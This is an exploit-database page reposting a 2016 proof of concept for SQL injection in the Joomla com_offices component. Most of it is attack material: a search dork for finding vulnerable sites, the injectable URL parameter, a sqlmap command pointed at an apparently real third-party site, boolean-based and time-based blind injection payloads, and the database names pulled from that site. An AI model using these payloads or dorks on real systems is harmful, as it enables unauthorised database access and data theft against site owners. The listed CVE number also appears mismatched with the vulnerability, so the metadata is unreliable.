Advertisement






Joomla com_offices SQL injection Vulnerability

CVE Category Price Severity
CVE-2017-2423 CWE-89 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2016-08-31
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016080271

Below is a copy:

Joomla com_offices SQL injection VulnerabilityExploit Title : Joomla com_offices SQL injection Vulnerability
Date:31/08/2016
Test on: Parrot
Dork: inurl:option=com_offices
Vuln: http://site.com/index.php?option=com_offices&oid=3&download=1&file=294'
Video Proof :
Poc:
sqlmap -u "http://www.smas-ip.com/index.php?option=com_offices&oid=3&download=1&file=294*" --dbs
sqlmap identified the following injection point(s) with a total of 45 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://site.com:80/index.php?option=com_offices&oid=3&download=1&file=294' AND 1003=1003 AND 'JsAr'='JsAr

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://site:80/index.php?option=com_offices&oid=3&download=1&file=294' AND (SELECT * FROM (SELECT(SLEEP(5)))DKXQ) AND 'tkfO'='tkfO
available databases [2]:                                                       
[*] brandeni_smas
[*] information_schema

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum